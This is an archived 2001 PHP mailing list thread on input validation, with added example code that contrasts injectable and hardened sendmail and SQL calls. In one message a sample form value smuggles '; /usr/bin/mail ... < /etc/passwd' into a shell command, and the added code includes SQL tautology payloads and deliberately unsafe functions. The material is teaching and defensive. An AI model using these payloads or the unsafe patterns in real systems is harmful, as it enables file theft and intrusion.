Re: [PHP] Re: Mommy, is it true that...?
> > > Oh yeah. Guess I had a mental lapse there. If you are using, say, a script downloaded from freshmeat.net and it happens to be poorly secured then obviously the entire free world is going to know how to exploit your copy of it... duh
> >
> > Actually that's exactly what I had in mind. Heck, if your point is that they don't know your URL then what's the point in the whole security issue anyways?
>
> I'm sorry, you've lost me. When did the question of knowing URLs come into this? I was referring to a hacker having access to your PHP script source.

Well, my mistake. I thought you were being sarcastic, as in "Yeah, right, so if I download a poorly secured datePicker.php from freshmeat.net then I'll become the target of all hacks in the world... duh!". So we've just spammed everybody on this list with four useless messages, just to find out we agree on this point. :-)

Bogdan

-- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
Re: [PHP] Re: Mommy, is it true that...?
At 06:03 PM 12/20/2001 -0800, Philip Hallstrom wrote:
> > I've done something similar in the past just for kicks, and I got the same result you did (i.e. an error). I believe this is because mysql_query() expects ONE query at a time and will break if you send two or more. I could be completely and totally wrong about that, though (someone please correct me if I am)...
>
> Maybe this one failed, but it's always a good idea to check user input. Let's say you're emailing a form and you don't use the mail() function, but make a call directly to sendmail... and you're sloppy... so you do this:
> [...]

True. But we were speaking specifically about MySQL. When you start toying with external programs and exec() and so forth then you've opened up a whole other can of worms security-wise...

> $fp = popen("/usr/bin/sendmail $sendto", "w");  # $sendto goes straight into a shell command line
> # write stuff to pipe to send email...
>
> Now... what if when I filled out the form I set $sendto equal to this:
>
> [EMAIL PROTECTED]; /usr/bin/mail [EMAIL PROTECTED] < /etc/passwd

A definite possibility, but it does depend on the hacker in question knowing exactly how your script is written...
Re: [PHP] Re: Mommy, is it true that...?
> At 06:03 PM 12/20/2001 -0800, Philip Hallstrom wrote:
> > > I've done something similar in the past just for kicks, and I got the same result you did (i.e. an error). I believe this is because mysql_query() expects ONE query at a time and will break if you send two or more. I could be completely and totally wrong about that, though (someone please correct me if I am)...
> >
> > Maybe this one failed, but it's always a good idea to check user input. Let's say you're emailing a form and you don't use the mail() function, but make a call directly to sendmail... and you're sloppy... so you do this:
> > [...]
>
> True. But we were speaking specifically about MySQL. When you start toying with external programs and exec() and so forth then you've opened up a whole other can of worms security-wise...

True, but why take the chance? :) I didn't see an equivalent for MySQL, but PostgreSQL has a pg_put_line() which just sends a NULL terminated string to the backend so you can do whatever you want (ie. multi statement). So in that case things could get messed up.

> > $fp = popen("/usr/bin/sendmail $sendto", "w");  # $sendto goes straight into a shell command line
> > # write stuff to pipe to send email...
> >
> > Now... what if when I filled out the form I set $sendto equal to this:
> >
> > [EMAIL PROTECTED]; /usr/bin/mail [EMAIL PROTECTED] < /etc/passwd
>
> A definite possibility, but it does depend on the hacker in question knowing exactly how your script is written...

True, but in a shared hosting environment this is very likely.

-philip
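The sendmail pipe quoted in the two messages above, as an added example that is not code from the thread or from any of its participants: the injectable form next to a hardened one. The function names, the sample addresses and the attacker string are constructed for the demonstration; the only real calls are PHP's popen(), filter_var() and escapeshellarg().

```php
<?php
// Added example, not code from the thread. Function names and sample
// addresses are made up for the demonstration.

// Injectable: $sendto is pasted into a command line that popen() hands to
// /bin/sh, so ';', '|', '`', '$(...)' and redirections in the recipient
// become extra shell commands running as the web server user.
function sendmail_command_unsafe(string $sendto): string
{
    return "/usr/bin/sendmail $sendto";
}

// Hardened: accept only a syntactically valid address, refuse a leading '-'
// so the address cannot be parsed by sendmail as a switch (-C, -X, -oQ...),
// and quote it with escapeshellarg() so the shell sees exactly one argument.
// Returns null to signal "do not send".
function sendmail_command_safe(string $sendto): ?string
{
    $addr = filter_var($sendto, FILTER_VALIDATE_EMAIL);
    if ($addr === false || $addr[0] === '-') {
        return null;
    }
    // -i: a line consisting of a single '.' does not end the message
    return '/usr/bin/sendmail -i ' . escapeshellarg($addr);
}

// Header values are a second injection surface: a CR/LF in $subject would
// let the submitter append arbitrary headers (Bcc:, extra recipients).
function header_value(string $v): string
{
    return str_replace(["\r", "\n"], '', $v);
}

function send_message(string $sendto, string $subject, string $body): bool
{
    $cmd = sendmail_command_safe($sendto);
    if ($cmd === null) {
        return false;                     // refused before any shell is involved
    }
    $fp = popen($cmd, 'w');
    if ($fp === false) {
        return false;
    }
    fwrite($fp, 'To: ' . header_value($sendto) . "\r\n");
    fwrite($fp, 'Subject: ' . header_value($subject) . "\r\n\r\n");
    fwrite($fp, $body . "\n");
    return pclose($fp) === 0;
}

// Constructed attacker input of the shape quoted in the thread.
$evil = 'victim@example.com; /usr/bin/mail attacker@example.net < /etc/passwd';

echo "unsafe command line: ", sendmail_command_unsafe($evil), "\n";
var_dump(sendmail_command_safe($evil));                 // null: rejected by FILTER_VALIDATE_EMAIL
var_dump(sendmail_command_safe('victim@example.com'));  // single quoted argument, nothing for sh to interpret
var_dump(sendmail_command_safe('-oQ/tmp@example.com')); // null: leading dash refused
```

The validation step does the real work; escapeshellarg() is belt and braces for the case where the validator is later loosened. Using mail() instead of a hand-rolled pipe removes the shell from the picture entirely, but the header_value() stripping still applies to anything that ends up in a header.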
Re: [PHP] Re: Mommy, is it true that...?
Philip Hallstrom wrote:
> > A definite possibility, but it does depend on the hacker in question knowing exactly how your script is written...
>
> True, but in a shared hosting environment this is very likely.

...not to mention open source code. However, the discussion was indeed oriented towards MySQL. However (again), the exec() argument is indeed something worth mentioning - I now realize there may be some serious security holes in an open-source project I'm currently working on (ouch!)

Bogdan
Re: [PHP] Re: Mommy, is it true that...?
how does one prevent a hacker deleting tables or what not? This is a topic I do not know enough about, thanks for opening my eyes to this matter

joel
Re: [PHP] Re: Mommy, is it true that...?
Well, the official point is rather obvious from my original e-mail. What I personally do is either forget about it -- again, see the original e-mail -- or, if for some reason high security is needed, I simply add 0 (zero) to numeral input fields and addslashes to strings.

Bogdan

[EMAIL PROTECTED] wrote:
> how does one prevent a hacker deleting tables or what not? This is a topic I do not know enough about, thanks for opening my eyes to this matter
>
> joel
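Joel's question and Bogdan's two rules ("add 0 to numerals, addslashes to strings"), as an added example that is not code from the thread. It uses an in-memory SQLite database through PDO so it runs stand-alone; the table, rows, payloads and function names are constructed. Two points it makes that the messages above do not: the single-statement behaviour of mysql_query() does not help when the attacker bends the WHERE clause of the one statement that does run, and a bound parameter replaces addslashes() without depending on the quoting rules of a particular dialect (addslashes() produces MySQL-style backslash escapes, which SQLite does not understand). A DROP TABLE needs either a second statement or a database account that holds the DROP privilege; giving the web application's account only the privileges it needs closes that path independently of the query code.

```php
<?php
// Added example, not code from the thread. Table, rows, payloads and
// function names are constructed; SQLite stands in for MySQL.

function make_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)');
    $db->exec("INSERT INTO users VALUES (1, 'alice', 'a-secret'), (2, 'bob', 'b-secret')");
    return $db;
}

// The pattern the thread treats as "probably fine" because mysql_query()
// runs only one statement. No second statement is needed: the attacker
// rewrites the WHERE clause of the one statement that does run.
function lookup_by_name_unsafe(PDO $db, string $name): array
{
    $sql = "SELECT id, name FROM users WHERE name = '$name'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

function lookup_by_id_unsafe(PDO $db, string $id): array
{
    $sql = "SELECT id, name FROM users WHERE id = $id";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Bogdan's rule for numerals ("add 0") in its PHP 8 form: an explicit (int)
// cast. '1 OR 1=1' becomes 1 and 'abc' becomes 0, and the cast never throws,
// unlike '+ 0' on a non-numeric string in PHP 8. The integer is then bound
// rather than interpolated.
function lookup_by_id_safe(PDO $db, string $id): array
{
    $stmt = $db->prepare('SELECT id, name FROM users WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// For strings, a bound parameter replaces addslashes(): the driver ships the
// value separately from the SQL text, so the dialect's quoting rules
// (MySQL backslash escapes, SQLite doubled quotes) never come into play.
function lookup_by_name_safe(PDO $db, string $name): array
{
    $stmt = $db->prepare('SELECT id, name FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = make_db();

// Constructed attacker inputs.
$tautology = "x' OR '1'='1";   // string field
$numeric   = '1 OR 1=1';       // numeric field

printf("unsafe name lookup : %d rows\n", count(lookup_by_name_unsafe($db, $tautology)));
printf("unsafe id lookup   : %d rows\n", count(lookup_by_id_unsafe($db, $numeric)));
printf("bound name lookup  : %d rows\n", count(lookup_by_name_safe($db, $tautology)));
printf("cast+bound id      : %d rows\n", count(lookup_by_id_safe($db, $numeric)));
```

Run it with `php example.php` (the pdo_sqlite extension must be loaded). The two unsafe lookups return every row in the table; the two bound lookups return only what the literal input matches. The same prepare/bindValue calls work unchanged against MySQL through PDO's mysql driver, which is where the thread's scripts would actually run.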
Re: [PHP] Re: Mommy, is it true that...?
At 04:26 AM 12/21/2001 +0200, Bogdan Stancescu wrote:
> Philip Hallstrom wrote:
> > > A definite possibility, but it does depend on the hacker in question knowing exactly how your script is written...
> >
> > True, but in a shared hosting environment this is very likely.
>
> ...not to mention open source code.

Oh yeah. Guess I had a mental lapse there. If you are using, say, a script downloaded from freshmeat.net and it happens to be poorly secured then obviously the entire free world is going to know how to exploit your copy of it... duh
Re: [PHP] Re: Mommy, is it true that...?
> > > True, but in a shared hosting environment this is very likely.
> >
> > ...not to mention open source code.
>
> Oh yeah. Guess I had a mental lapse there. If you are using, say, a script downloaded from freshmeat.net and it happens to be poorly secured then obviously the entire free world is going to know how to exploit your copy of it... duh

Actually that's exactly what I had in mind. Heck, if your point is that they don't know your URL then what's the point in the whole security issue anyways?
Re: [PHP] Re: Mommy, is it true that...?
At 04:51 AM 12/21/2001 +0200, Bogdan Stancescu wrote:
> > > > True, but in a shared hosting environment this is very likely.
> > >
> > > ...not to mention open source code.
> >
> > Oh yeah. Guess I had a mental lapse there. If you are using, say, a script downloaded from freshmeat.net and it happens to be poorly secured then obviously the entire free world is going to know how to exploit your copy of it... duh
>
> Actually that's exactly what I had in mind. Heck, if your point is that they don't know your URL then what's the point in the whole security issue anyways?

I'm sorry, you've lost me. When did the question of knowing URLs come into this? I was referring to a hacker having access to your PHP script source. Freshmeat.net is a very popular database of linux software and includes a wide variety of PHP scripts. My point was that if you downloaded an insecure script from such a popular site then you are asking for trouble because chances are thousands of would-be hackers have ALSO downloaded the same script and have familiarized themselves with ways that it can be exploited...
RE: [PHP] Re: Mommy, is it true that...?
My 2c worth...

IMO, if you download a script and just blindly copy it to your system, then you're just asking for trouble, period - I think you should ALWAYS check code for anything that could be malicious and also check for any loopholes that need to be closed before using it. This might mean changing the names of variables/functions or rewriting some of the code entirely. I don't trust any code that people send me, I always check it first, if possible...

-----Original Message-----
From: Michael Sims [mailto:[EMAIL PROTECTED]]
Sent: Friday, December 21, 2001 3:20 PM
To: [EMAIL PROTECTED]
Subject: Re: [PHP] Re: Mommy, is it true that...?

At 04:51 AM 12/21/2001 +0200, Bogdan Stancescu wrote:
> > > > True, but in a shared hosting environment this is very likely.
> > >
> > > ...not to mention open source code.
> >
> > Oh yeah. Guess I had a mental lapse there. If you are using, say, a script downloaded from freshmeat.net and it happens to be poorly secured then obviously the entire free world is going to know how to exploit your copy of it... duh
>
> Actually that's exactly what I had in mind. Heck, if your point is that they don't know your URL then what's the point in the whole security issue anyways?

I'm sorry, you've lost me. When did the question of knowing URLs come into this? I was referring to a hacker having access to your PHP script source. Freshmeat.net is a very popular database of linux software and includes a wide variety of PHP scripts. My point was that if you downloaded an insecure script from such a popular site then you are asking for trouble because chances are thousands of would-be hackers have ALSO downloaded the same script and have familiarized themselves with ways that it can be exploited...
Re: [PHP] Re: Mommy, is it true that...?
> Freshmeat.net is a very popular database of linux software and includes a wide variety of PHP scripts. My point was that if you downloaded an insecure script from such a popular site then you are asking for trouble because chances are thousands of would-be hackers have ALSO downloaded the same script and have familiarized themselves with ways that it can be exploited...

So would you rather just use pre-compiled binaries from some company that says "trust me"? You're responsible for the code on your site. If it's open-source one at least has a fighting chance of examining it. If it's too complex for someone to understand, then they shouldn't use it.

Billy
Re: [PHP] Re: Mommy, is it true that...?
At 11:28 PM 12/20/2001 -0500, Billy Harvey wrote:
> > Freshmeat.net is a very popular database of linux software and includes a wide variety of PHP scripts. My point was that if you downloaded an insecure script from such a popular site then you are asking for trouble because chances are thousands of would-be hackers have ALSO downloaded the same script and have familiarized themselves with ways that it can be exploited...
>
> So would you rather just use pre-compiled binaries from some company that says "trust me"?

Sigh. No. The thread has meandered quite a bit, and you'd have to read the whole thing to see how we got to this point. To summarize: Someone made the point that you should always carefully check user submitted data, and provided an example using a poorly secured fopen() statement whereby a hacker could gain access to /etc/passwd. I responded by saying that to do such a thing the hacker would have to know exactly how your code is written. Someone else responded saying that this was indeed likely in shared hosting environments or open source software. The above is me agreeing and saying "oh, I didn't think of that". Nowhere did I say that I think this is a disadvantage of OSS.

If you wish to extrapolate an argument from what I wrote above then here's a good one: When you install software that could be a potential security risk then you should attempt to use well established, peer-reviewed OPEN SOURCE software and ideally review the code yourself to make sure it meets your standards of security and doesn't contain any nasty exploits. See, I'm one of the good guys... a dot communist, just like you. ;-)
RE: [PHP] Re: Mommy, is it true that...?
another 2c worth...

So it's the programmer's responsibility to ensure all his/her code is as secure as possible. If it can be shown that it isn't secure, then the programmer should endeavour to close that hole. This goes for any area that hackers can exploit, software and hardware...

-----Original Message-----
From: Michael Sims [mailto:[EMAIL PROTECTED]]
Sent: Friday, December 21, 2001 3:43 PM
To: [EMAIL PROTECTED]
Subject: Re: [PHP] Re: Mommy, is it true that...?

At 11:28 PM 12/20/2001 -0500, Billy Harvey wrote:
> > Freshmeat.net is a very popular database of linux software and includes a wide variety of PHP scripts. My point was that if you downloaded an insecure script from such a popular site then you are asking for trouble because chances are thousands of would-be hackers have ALSO downloaded the same script and have familiarized themselves with ways that it can be exploited...
>
> So would you rather just use pre-compiled binaries from some company that says "trust me"?

Sigh. No. The thread has meandered quite a bit, and you'd have to read the whole thing to see how we got to this point. To summarize: Someone made the point that you should always carefully check user submitted data, and provided an example using a poorly secured fopen() statement whereby a hacker could gain access to /etc/passwd. I responded by saying that to do such a thing the hacker would have to know exactly how your code is written. Someone else responded saying that this was indeed likely in shared hosting environments or open source software. The above is me agreeing and saying "oh, I didn't think of that". Nowhere did I say that I think this is a disadvantage of OSS.

If you wish to extrapolate an argument from what I wrote above then here's a good one: When you install software that could be a potential security risk then you should attempt to use well established, peer-reviewed OPEN SOURCE software and ideally review the code yourself to make sure it meets your standards of security and doesn't contain any nasty exploits. See, I'm one of the good guys... a dot communist, just like you. ;-)